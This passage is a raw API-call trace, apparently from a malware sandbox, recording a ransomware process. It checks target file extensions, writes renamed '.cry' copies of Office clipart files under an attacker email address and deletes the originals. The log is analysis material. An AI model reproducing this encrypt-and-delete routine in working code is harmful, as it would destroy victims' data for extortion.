(lpString=".docx") returned 5 [0053.147] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.147] lstrlenW (lpString=".pdf") returned 4 [0053.147] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.147] lstrlenW (lpString=".xls") returned 4 [0053.147] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.147] lstrlenW (lpString=".xlsx") returned 5 [0053.147] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.147] lstrlenW (lpString=".ppt") returned 4 [0053.147] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0053.147] lstrlenW (lpString=".zip") returned 4 [0053.148] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.148] lstrlenW (lpString=".rar") returned 4 [0053.148] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.148] lstrlenW (lpString=".bz2") returned 4 [0053.148] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.148] lstrlenW (lpString=".7z") returned 3 [0053.148] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0053.148] lstrlenW (lpString=".dbf") returned 4 [0053.148] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0053.148] lstrlenW (lpString=".1cd") returned 4 [0053.148] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0053.148] lstrlenW (lpString=".jpg") returned 4 [0053.148] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.148] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=3228) returned 1 [0053.148] CloseHandle (hObject=0x16c) returned 1 [0053.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf")) returned 0x20 [0053.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0053.149] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.149] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0053.149] GetLastError () returned 0x0 [0053.149] ReadFile (in: hFile=0x16c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0xc9c, lpOverlapped=0x0) returned 1 [0053.197] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xca0, lpOverlapped=0x0) returned 1 [0053.198] ReadFile (in: hFile=0x16c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.198] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.198] SetEndOfFile (hFile=0x1ac) returned 1 [0053.198] CloseHandle (hObject=0x1ac) returned 1 [0053.199] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.199] SetEndOfFile (hFile=0x16c) returned 1 [0053.199] CloseHandle (hObject=0x16c) returned 1 [0053.199] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.200] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf")) returned 1 [0053.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0053.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0053.200] lstrlenW (lpString=".doc") returned 4 [0053.200] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.200] lstrlenW (lpString=".docx") returned 5 [0053.200] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.200] lstrlenW (lpString=".pdf") returned 4 [0053.200] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.200] lstrlenW (lpString=".xls") returned 4 [0053.200] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.200] lstrlenW (lpString=".xlsx") returned 5 [0053.200] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.200] lstrlenW (lpString=".ppt") returned 4 [0053.200] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0053.200] lstrlenW (lpString=".zip") returned 4 [0053.200] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.200] lstrlenW (lpString=".rar") returned 4 [0053.200] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.200] lstrlenW (lpString=".bz2") returned 4 [0053.200] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.200] lstrlenW (lpString=".7z") returned 3 [0053.200] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0053.200] lstrlenW (lpString=".dbf") returned 4 [0053.200] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0053.200] lstrlenW (lpString=".1cd") returned 4 [0053.200] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0053.201] lstrlenW (lpString=".jpg") returned 4 [0053.201] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.252] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=4870) returned 1 [0053.252] CloseHandle (hObject=0x1ac) returned 1 [0053.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf")) returned 0x20 [0053.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0053.252] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.252] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.253] GetLastError () returned 0x0 [0053.253] ReadFile (in: hFile=0x1ac, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x1306, lpOverlapped=0x0) returned 1 [0053.328] WriteFile (in: hFile=0x218, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1310, lpOverlapped=0x0) returned 1 [0053.329] ReadFile (in: hFile=0x1ac, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.329] WriteFile (in: hFile=0x218, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.329] SetEndOfFile (hFile=0x218) returned 1 [0053.421] CloseHandle (hObject=0x218) returned 1 [0053.421] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.421] SetEndOfFile (hFile=0x1ac) returned 1 [0053.422] CloseHandle (hObject=0x1ac) returned 1 [0053.422] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.422] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf")) returned 1 [0053.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0053.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0053.422] lstrlenW (lpString=".doc") returned 4 [0053.422] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.422] lstrlenW (lpString=".docx") returned 5 [0053.422] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.422] lstrlenW (lpString=".pdf") returned 4 [0053.422] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.422] lstrlenW (lpString=".xls") returned 4 [0053.422] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.422] lstrlenW (lpString=".xlsx") returned 5 [0053.422] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.423] lstrlenW (lpString=".ppt") returned 4 [0053.423] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0053.423] lstrlenW (lpString=".zip") returned 4 [0053.423] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.423] lstrlenW (lpString=".rar") returned 4 [0053.423] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.423] lstrlenW (lpString=".bz2") returned 4 [0053.423] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.423] lstrlenW (lpString=".7z") returned 3 [0053.423] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0053.423] lstrlenW (lpString=".dbf") returned 4 [0053.423] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0053.423] lstrlenW (lpString=".1cd") returned 4 [0053.423] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0053.423] lstrlenW (lpString=".jpg") returned 4 [0053.423] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.423] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=16112) returned 1 [0053.423] CloseHandle (hObject=0x1ac) returned 1 [0053.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf")) returned 0x20 [0053.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0053.424] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.424] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.424] GetLastError () returned 0x0 [0053.424] ReadFile (in: hFile=0x1ac, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x3ef0, lpOverlapped=0x0) returned 1 [0053.426] WriteFile (in: hFile=0x218, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x3f00, lpOverlapped=0x0) returned 1 [0053.427] ReadFile (in: hFile=0x1ac, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.427] WriteFile (in: hFile=0x218, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.427] SetEndOfFile (hFile=0x218) returned 1 [0053.427] CloseHandle (hObject=0x218) returned 1 [0053.427] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.427] SetEndOfFile (hFile=0x1ac) returned 1 [0053.428] CloseHandle (hObject=0x1ac) returned 1 [0053.428] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.428] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf")) returned 1 [0053.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0053.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0053.428] lstrlenW (lpString=".doc") returned 4 [0053.428] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.428] lstrlenW (lpString=".docx") returned 5 [0053.428] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.428] lstrlenW (lpString=".pdf") returned 4 [0053.428] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.428] lstrlenW (lpString=".xls") returned 4 [0053.428] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.428] lstrlenW (lpString=".xlsx") returned 5 [0053.429] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.429] lstrlenW (lpString=".ppt") returned 4 [0053.429] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0053.429] lstrlenW (lpString=".zip") returned 4 [0053.429] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.429] lstrlenW (lpString=".rar") returned 4 [0053.429] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.429] lstrlenW (lpString=".bz2") returned 4 [0053.429] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.429] lstrlenW (lpString=".7z") returned 3 [0053.429] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0053.429] lstrlenW (lpString=".dbf") returned 4 [0053.429] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0053.429] lstrlenW (lpString=".1cd") returned 4 [0053.429] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0053.429] lstrlenW (lpString=".jpg") returned 4 [0053.429] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.430] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=16676) returned 1 [0053.430] CloseHandle (hObject=0x1ac) returned 1 [0053.430] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf")) returned 0x20 [0053.430] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0053.430] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.430] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.431] GetLastError () returned 0x0 [0053.431] ReadFile (in: hFile=0x1ac, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x4124, lpOverlapped=0x0) returned 1 [0053.458] WriteFile (in: hFile=0x218, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x4130, lpOverlapped=0x0) returned 1 [0053.460] ReadFile (in: hFile=0x1ac, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.461] WriteFile (in: hFile=0x218, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.461] SetEndOfFile (hFile=0x218) returned 1 [0053.461] CloseHandle (hObject=0x218) returned 1 [0053.461] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.461] SetEndOfFile (hFile=0x1ac) returned 1 [0053.462] CloseHandle (hObject=0x1ac) returned 1 [0053.462] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.463] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf")) returned 1 [0053.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0053.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0053.463] lstrlenW (lpString=".doc") returned 4 [0053.463] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.463] lstrlenW (lpString=".docx") returned 5 [0053.463] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.463] lstrlenW (lpString=".pdf") returned 4 [0053.463] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.463] lstrlenW (lpString=".xls") returned 4 [0053.463] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.463] lstrlenW (lpString=".xlsx") returned 5 [0053.463] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.463] lstrlenW (lpString=".ppt") returned 4 [0053.463] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0053.464] lstrlenW (lpString=".zip") returned 4 [0053.464] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.464] lstrlenW (lpString=".rar") returned 4 [0053.464] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.464] lstrlenW (lpString=".bz2") returned 4 [0053.464] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.464] lstrlenW (lpString=".7z") returned 3 [0053.464] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0053.464] lstrlenW (lpString=".dbf") returned 4 [0053.464] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0053.464] lstrlenW (lpString=".1cd") returned 4 [0053.464] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0053.464] lstrlenW (lpString=".jpg") returned 4 [0053.464] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.731] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=4066) returned 1 [0054.732] CloseHandle (hObject=0x190) returned 1 [0054.732] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf")) returned 0x20 [0054.732] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0054.732] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, 